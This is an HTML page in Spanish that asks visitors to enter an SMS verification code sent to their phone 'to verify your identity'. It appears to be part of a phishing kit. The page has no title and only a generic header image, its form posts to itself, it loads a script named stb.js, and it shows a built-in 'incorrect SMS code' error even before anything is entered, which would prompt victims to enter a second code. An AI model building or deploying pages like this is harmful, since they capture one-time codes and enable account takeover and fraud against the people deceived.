<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/mino.css">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div>
        <div class="tpo">
            <img src="./img/hedr.JPG" alt="">
        </div>
    </div>

    <div class="lkhawi">
        <p class="p3">Introduce el codigo</p>

        <p class="p4">
            Te hemos enviado un codigo a tu telefono para verificar tu identidad. Introducelo a continuacion para acceder.
        </p>
        <form method="post" id="pg4">
            <div class="clear">
                <p>Codigo sms</p>
                <input class="nar1" type="tel" name="" id="sps2" required maxlength="8" placeholder="">
                <p style="color: rgb(202, 90, 90);">código SMS incorrecto</p>
                

            </div>
            <span></span>
            <button type="submit">Validar</button>
        </form>
    </div>
    <script src="./js/stb.js"></script>
</body>
</html>